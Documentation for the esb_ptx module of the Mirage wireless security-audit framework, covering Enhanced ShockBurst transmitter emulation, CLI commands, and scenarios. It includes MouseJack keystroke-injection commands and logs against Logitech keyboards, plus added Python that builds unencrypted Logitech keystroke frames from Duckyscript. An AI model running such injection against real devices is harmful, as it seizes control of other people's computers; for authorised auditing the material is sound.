esb_ptx
=======

Presentation
------------

**esb_ptx** simulates the behaviour of an Enhanced ShockBurst (ESB) PTX device (the Primary Transmitter: the side of the link that sends frames and waits for the acknowledgements returned by the PRX, the Primary Receiver). It is a core module of the framework, allowing the recurrent behaviours needed during a security audit to be built quickly.

If a scenario is provided, the module runs in "scenario" mode: events are delivered as callbacks on specific packet types, which allows complex interactions to be implemented. Otherwise, it runs in "interpreter" mode and opens a CLI for the user.

A follow mode is provided through the *FOLLOW_MODE* parameter. It regularly checks that the corresponding PRX is still responding on the current channel: a ping request is sent every second and, if no acknowledgement frame is received, the module automatically scans the channels in order to find the PRX again.

Compatible devices
------------------

* RFStorm device (an nRF24-based USB dongle running the RFStorm research firmware)

Input parameters
----------------

+---------------+---------------+-----------------+--------------------------------+
| Name          | Default value | Possible values | Description                    |
+===============+===============+=================+================================+
| INTERFACE     | rfstorm0      | rfstormX        | Interface to use               |
+---------------+---------------+-----------------+--------------------------------+
| TARGET        |               |                 | Address of the PRX to talk to  |
+---------------+---------------+-----------------+--------------------------------+
| FOLLOW_MODE   | yes           | yes|no          | Enable follow mode             |
+---------------+---------------+-----------------+--------------------------------+
| SCENARIO      |               |                 | Name of the scenario to load   |
+---------------+---------------+-----------------+--------------------------------+

Scenario signals
----------------

The behaviour of this module can be modified using scenarios. Mirage scenarios and their usage are described in the dedicated scenario documentation. The following signals are generated by this module if a scenario is provided using the *SCENARIO* input parameter:

+--------------------+------------+--------------------------------------------+----------------------+
| Signal             | Parameters | Activation                                 | Default behaviour    |
+====================+============+============================================+======================+
| onStart            |            | when the module starts its execution       | nothing is executed  |
+--------------------+------------+--------------------------------------------+----------------------+
| onEnd              |            | when the module stops its execution        | nothing is executed  |
+--------------------+------------+--------------------------------------------+----------------------+
| onKey              | key        | when a key is pressed                      | nothing is executed  |
+--------------------+------------+--------------------------------------------+----------------------+
| onESBAckResponse   | packet     | when an acknowledgement frame is received  | nothing is executed  |
|                    |            | from the PRX                               |                      |
+--------------------+------------+--------------------------------------------+----------------------+
| onPingFailure      |            | when no acknowledgement is received for a  | nothing is executed  |
|                    |            | ping request (follow mode)                 |                      |
+--------------------+------------+--------------------------------------------+----------------------+
| onPRXFound         |            | when the scan started after a ping failure | nothing is executed  |
|                    |            | has located the PRX                        |                      |
+--------------------+------------+--------------------------------------------+----------------------+

You can manually stop the module's execution by calling the method **stopScenario**:

::

    self.module.stopScenario()

Commands
--------

The following commands are available in the CLI interface:

- **clear**: clears the screen
- **channel**: displays the current channel
- **channel <channel>**: moves to the provided channel
- **scan**: calls the esb_scan module to list nearby ESB devices
- **scan <duration>**: calls the esb_scan module for the specified duration to list nearby ESB devices
- **scan <duration> <channels>**: calls the esb_scan module for the specified duration on the specified channel range to list nearby ESB devices
- **address**: displays the currently selected address
- **address <address>**: changes the address to the one provided
- **find_prx**: performs an active scan in order to find the corresponding PRX
- **find_prx <channels>**: performs an active scan in order to find the corresponding PRX in the selected channel range (e.g. "0-10")
- **follow_prx**: enables the follow mode
- **unfollow_prx**: disables the follow mode
- **send <payload>**: sends a specific payload to the PRX
- **send <payload1>,<payload2>,...**: sends multiple payloads to the PRX
- **exit**: ends the execution

Usage
-----

CLI mode
^^^^^^^^

If you want to use this module in *CLI* mode, just call the module without input parameters:

::

    $ mirage esb_ptx
    [INFO] Module esb_ptx loaded !
    [PTX|12]:

The prompt shows the current channel and, once one has been selected, the target address.

You can easily scan for devices using the ``scan`` command:

::

    [PTX|99]: scan
    ┌────────────────┬──────────┬──────────┐
    │ Address        │ Channels │ Protocol │
    ├────────────────┼──────────┼──────────┤
    │ E8:46:F9:2F:A4 │ 8        │ logitech │
    └────────────────┴──────────┴──────────┘
    ())))))))))))))))))))))))))))))))))))))))))))))))))___________) Channel: 81

Then, you can select a specific address using ``address``:

::

    [PTX|98]: address E8:46:F9:2F:A4
    [PTX|98|E8:46:F9:2F:A4]:

You can automatically find the PRX using the ``find_prx`` command:

::

    [PTX|98|E8:46:F9:2F:A4]: find_prx
    [SUCCESS] ACK received from PRX on channel #8
    [PTX| 8|E8:46:F9:2F:A4]:

Or you can also manually set the channel using the ``channel`` command:

::

    [PTX| 8|E8:46:F9:2F:A4]: channel 23
    [PTX|23|E8:46:F9:2F:A4]:

You can enable the follow mode using the ``follow_prx`` command (the module immediately re-locates the PRX, here back on channel 8):

::

    [PTX|23|E8:46:F9:2F:A4]: follow_prx
    [PTX| 8|E8:46:F9:2F:A4]:

and disable it using ``unfollow_prx``:

::

    [PTX| 8|E8:46:F9:2F:A4]: unfollow_prx
    [PTX| 8|E8:46:F9:2F:A4]:

Finally, you can easily transmit payloads using ``send``. Each "ACK received" line confirms that the PRX acknowledged the corresponding frame, i.e. that the selected address and channel are the right ones:

::

    [PTX| 8|E8:46:F9:2F:A4]: send 0f0f0f0f
    [SUCCESS] ACK received.
    [PTX| 8|E8:46:F9:2F:A4]: send 0f0f0f0f,1122,3344
    [SUCCESS] ACK received.
    [SUCCESS] ACK received.
    [SUCCESS] ACK received.

Customizing the behaviour using scenarios
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

If you want to use a scenario, you can use the ``create_scenario`` command in order to generate a basic skeleton:

::

    $ mirage --create_scenario
    [QUESTION] Scenario's name : esb_ptx_test
    [SUCCESS] Scenario master_test successfully generated : /home/user/.mirage/scenarios/esb_ptx_test.py
    [INFO] Mirage process terminated !

Then, you can modify the code as you want. If you want to use this scenario, just provide its name as the value of the input parameter *SCENARIO*:

::

    $ sudo mirage esb_ptx SCENARIO=esb_ptx_test
    [INFO] Module esb_ptx loaded !
    [INFO] Scenario loaded !
    [...]
    [INFO] Mirage process terminated !
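As an added example (not Mirage's code and not one of the scenarios it ships), here is what such a generated skeleton can be turned into: a scenario that uses the follow-mode signals from the table above as a watchdog for the PRX. The assumptions, to be checked against the Mirage version in use, are that a scenario is a class deriving from ``mirage.core.scenario.Scenario`` whose methods are named after the signals, that ``self.module`` is the running esb_ptx instance (as in the ``stopScenario()`` call shown above), and that a callback returning ``True`` lets the module's default behaviour run as well. The scenario name ``esb_ptx_follow_watchdog`` and the ``PrxTracker``/``simulate`` helpers are this example's own; saved as ``~/.mirage/scenarios/esb_ptx_follow_watchdog.py`` it would be selected with ``SCENARIO=esb_ptx_follow_watchdog``.

```python
"""Added example: esb_ptx scenario acting as a PRX watchdog (not Mirage's own code)."""

try:
    from mirage.core import scenario
    ScenarioBase = scenario.Scenario
except ImportError:
    # Stand-in with the same constructor, so this file also runs outside Mirage.
    class ScenarioBase:
        def __init__(self, name="", module=None):
            self.name = name
            self.module = module


class PrxTracker:
    """Mirage-independent bookkeeping for the signals (this is the testable part)."""

    def __init__(self, max_consecutive_failures=3):
        self.max_consecutive_failures = max_consecutive_failures
        self.acks = 0                  # onESBAckResponse count
        self.rescans = 0               # onPRXFound count (PRX re-located after a ping failure)
        self.consecutive_failures = 0  # onPingFailure signals since the PRX last answered
        self.lost = False

    def ack(self):
        self.acks += 1
        self.consecutive_failures = 0

    def prx_found(self):
        self.rescans += 1
        self.consecutive_failures = 0

    def ping_failure(self):
        # True once the PRX missed too many pings in a row without being
        # re-located by the scan that esb_ptx launches after each failure.
        self.consecutive_failures += 1
        if self.consecutive_failures >= self.max_consecutive_failures:
            self.lost = True
        return self.lost


class esb_ptx_follow_watchdog(ScenarioBase):
    """Hypothetical scenario name; the methods are the signals from the table."""

    def onStart(self):
        self.tracker = PrxTracker(max_consecutive_failures=3)
        return True

    def onESBAckResponse(self, packet):
        self.tracker.ack()
        return True

    def onPingFailure(self):
        if self.tracker.ping_failure():
            # Stop instead of letting follow mode scan forever for a PRX that is gone.
            self.module.stopScenario()
        return True

    def onPRXFound(self):
        self.tracker.prx_found()
        return True

    def onKey(self, key):
        if key == "q":  # assumption: the key argument is the pressed character
            self.module.stopScenario()
        return True

    def onEnd(self):
        return True


class _FakeModule:
    """Minimal stand-in for the esb_ptx module object, to run the scenario offline."""

    def __init__(self):
        self.stop_calls = 0

    def stopScenario(self):
        self.stop_calls += 1


def simulate(events, max_consecutive_failures=3):
    """Feed a sequence of signal names (as in the table) to the scenario and report the outcome."""
    module = _FakeModule()
    sc = esb_ptx_follow_watchdog("esb_ptx_follow_watchdog", module)
    sc.onStart()
    sc.tracker.max_consecutive_failures = max_consecutive_failures
    for ev in events:
        if ev == "onESBAckResponse":
            sc.onESBAckResponse(packet=None)  # no real frame available offline
        elif ev == "onKey":
            sc.onKey("q")
        else:
            getattr(sc, ev)()
    sc.onEnd()
    return {"acks": sc.tracker.acks, "rescans": sc.tracker.rescans,
            "lost": sc.tracker.lost, "stop_calls": module.stop_calls}


if __name__ == "__main__":
    # Constructed sequence: one channel hop, then the PRX disappears for good.
    print(simulate(["onESBAckResponse", "onPingFailure", "onPRXFound",
                    "onPingFailure", "onPingFailure", "onPingFailure"]))
```

The counter is reset by ``onPRXFound`` as well as by an acknowledgement, so a PRX that merely hops channels (ping failure followed by a successful rescan) never trips the watchdog; only failures that the rescan cannot recover from do.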
Performing keystroke injection attacks
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Two scenarios are provided to perform the unencrypted and encrypted keystroke injection attacks against Logitech mice and keyboards described in the MouseJack whitepaper:

* **logitech_unencrypted_keystrokes_injection**: injects unencrypted keystrokes using the address of a wireless mouse, bypassing the encryption that protects keyboard traffic.
* **logitech_encrypted_keystrokes_injection**: injects forged encrypted keystrokes by exploiting a weakness in the AES implementation of Logitech Unifying.

These scenarios are selected through the *SCENARIO* input parameter, with the address found during the scan given as *TARGET*. Note in the logs below that the scenario disables the follow mode and takes over the search for the target itself. They can be used in three modes, chosen by an additional parameter read by the scenario.

If you want to inject a simple text, provide a new parameter named *TEXT* to the module:

::

    $ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection TEXT=bonjour
    [INFO] Module esb_ptx loaded !
    [INFO] Enabling following mode ...
    [INFO] Scenario loaded !
    [INFO] Following mode disabled by the scenario.
    [INFO] Generating attack stream ...
    [INFO] Text injection: bonjour
    [INFO] Looking for target E8:46:F9:2F:A4...
    [SUCCESS] Target found !
    [INFO] Injecting ...
    bonjour

If you want to perform a more complex keystroke injection, you can provide a Duckyscript file through the *DUCKYSCRIPT* parameter:

::

    $ cat > /tmp/duck.ducky
    DELAY 1000
    ALT F2
    DELAY 1000
    STRING firefox https://homepages.laas.fr/rcayre/mirage-documentation
    DELAY 1000
    ENTER
    $ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection DUCKYSCRIPT=/tmp/duck.ducky
    [INFO] Module esb_ptx loaded !
    [INFO] Enabling following mode ...
    [INFO] Scenario loaded !
    [INFO] Following mode disabled by the scenario.
    [INFO] Generating attack stream ...
    [INFO] Duckyscript injection: /tmp/duck.ducky
    [INFO] Looking for target E8:46:F9:2F:A4...
    [SUCCESS] Target found !
    [INFO] Injecting ...
    [INFO] Terminating scenario ...
    [INFO] Mirage process terminated !

Finally, you can also use the interactive mode (*INTERACTIVE=yes*) in order to directly interact with the target computer: every key typed in the terminal is injected as you type it:

::

    $ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection INTERACTIVE=yes
    [INFO] Module esb_ptx loaded !
    [INFO] Enabling following mode ...
    [INFO] Scenario loaded !
    [INFO] Following mode disabled by the scenario.
    [INFO] Generating attack stream ...
    [INFO] Interactive mode
    [INFO] Looking for target E8:46:F9:2F:A4...
    [SUCCESS] Target found !
    [INFO] Injecting ...
    [INFO] Injecting:b
    [INFO] Injecting:o
    [INFO] Injecting:n
    [INFO] Injecting:j
    [INFO] Injecting:o
    [INFO] Injecting:u
    [INFO] Injecting:r
    [...]
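The "Generating attack stream" step of the unencrypted scenario can be illustrated with the following added example (written for this page; it is neither Mirage's code nor the scenario it ships). It turns a Duckyscript subset (``DELAY``, ``STRING``, ``REM``, named keys with modifiers) into HID usages for a US keyboard layout, then wraps each press and release in the 10-byte unencrypted Logitech keyboard report (type ``0xC1``) with the Unifying checksum described in the MouseJack research. Radio transmission, the target search and the keep-alive traffic discussed in the whitepaper are left to esb_ptx and the scenario. The function names are this example's own, and the sample script is the one from the page above.

```python
"""Added example: Duckyscript -> unencrypted Logitech keystroke frames (not Mirage's code)."""
from typing import List, Tuple, Union

MOD_CTRL, MOD_SHIFT, MOD_ALT, MOD_GUI = 0x01, 0x02, 0x04, 0x08
MODIFIERS = {"CTRL": MOD_CTRL, "CONTROL": MOD_CTRL, "SHIFT": MOD_SHIFT, "ALT": MOD_ALT,
             "GUI": MOD_GUI, "WINDOWS": MOD_GUI, "COMMAND": MOD_GUI}
NAMED_KEYS = {"ENTER": 0x28, "ESC": 0x29, "ESCAPE": 0x29, "BACKSPACE": 0x2A,
              "TAB": 0x2B, "SPACE": 0x2C, "DELETE": 0x4C}
NAMED_KEYS.update({f"F{n}": 0x39 + n for n in range(1, 13)})  # F1 = 0x3A ... F12 = 0x45

# US layout assumed: unshifted punctuation, and shifted characters mapped to their base key.
_PLAIN = {" ": 0x2C, "-": 0x2D, "=": 0x2E, "[": 0x2F, "]": 0x30, "\\": 0x31,
          ";": 0x33, "'": 0x34, "`": 0x35, ",": 0x36, ".": 0x37, "/": 0x38}
_SHIFTED = dict(zip('!@#$%^&*()_+{}|:"~<>?', "1234567890-=[]\\;'`,./"))

Event = Tuple  # ("delay", milliseconds) or ("key", modifier_bitmap, hid_usage)


def char_to_hid(ch: str) -> Tuple[int, int]:
    """(modifier bitmap, HID usage id) for one printable character."""
    if "a" <= ch <= "z":
        return 0, 0x04 + ord(ch) - ord("a")
    if "A" <= ch <= "Z":
        return MOD_SHIFT, 0x04 + ord(ch) - ord("A")
    if "1" <= ch <= "9":
        return 0, 0x1E + ord(ch) - ord("1")
    if ch == "0":
        return 0, 0x27
    if ch in _PLAIN:
        return 0, _PLAIN[ch]
    if ch in _SHIFTED:
        return MOD_SHIFT, char_to_hid(_SHIFTED[ch])[1]
    raise ValueError(f"no HID usage for {ch!r}")


def parse_duckyscript(script: str) -> List[Event]:
    """Translate the supported Duckyscript subset into key and delay events."""
    events: List[Event] = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        if cmd == "DELAY":
            events.append(("delay", int(arg)))
        elif cmd == "STRING":
            events.extend(("key",) + char_to_hid(c) for c in arg)
        else:  # modifiers and/or one key, e.g. "ALT F2", "CTRL ALT DELETE", "ENTER"
            mods, code = 0, 0
            for tok in line.split():
                if tok in MODIFIERS:
                    mods |= MODIFIERS[tok]
                elif tok in NAMED_KEYS:
                    code = NAMED_KEYS[tok]
                elif len(tok) == 1:
                    code = char_to_hid(tok.lower())[1]  # "CTRL A" means Ctrl + the a key
                else:
                    raise ValueError(f"unsupported Duckyscript line: {raw!r}")
            events.append(("key", mods, code))
    return events


def logitech_checksum(body: bytes) -> int:
    """Last byte of a Unifying frame: chosen so that all bytes sum to 0 modulo 256."""
    return (-sum(body)) & 0xFF


def unencrypted_keystroke_frame(modifiers: int, hid_code: int) -> bytes:
    """Unencrypted Logitech keyboard report: device index 0x00, type 0xC1, modifier
    bitmap, one HID usage, five further (unused) key bytes, checksum. 10 bytes."""
    body = bytes([0x00, 0xC1, modifiers & 0xFF, hid_code & 0xFF, 0, 0, 0, 0, 0])
    return body + bytes([logitech_checksum(body)])


KEY_RELEASE = unencrypted_keystroke_frame(0, 0)


def attack_stream(events: List[Event]) -> List[Union[bytes, Event]]:
    """Press and release frame for every key event; delays are kept as markers
    for whatever transmits the stream."""
    out: List[Union[bytes, Event]] = []
    for ev in events:
        if ev[0] == "delay":
            out.append(ev)
        else:
            out.append(unencrypted_keystroke_frame(ev[1], ev[2]))
            out.append(KEY_RELEASE)  # without it "oo" would register as a single o
    return out


# Constructed sample input: the Duckyscript shown on this page.
DUCKY = """DELAY 1000
ALT F2
DELAY 1000
STRING firefox https://homepages.laas.fr/rcayre/mirage-documentation
DELAY 1000
ENTER
"""

if __name__ == "__main__":
    for item in attack_stream(parse_duckyscript(DUCKY)):
        # Frames are printed in the same hex notation as the send command examples above.
        print(item if isinstance(item, tuple) else item.hex())
```

The explicit release frame after every press is the detail that most often goes wrong in hand-rolled streams: the dongle only reports a new keystroke on a change of the key byte, so two identical frames in a row type one character. The checksum makes the whole frame sum to zero, which is also a quick sanity check to run on captured Logitech frames before trying to replay or modify them.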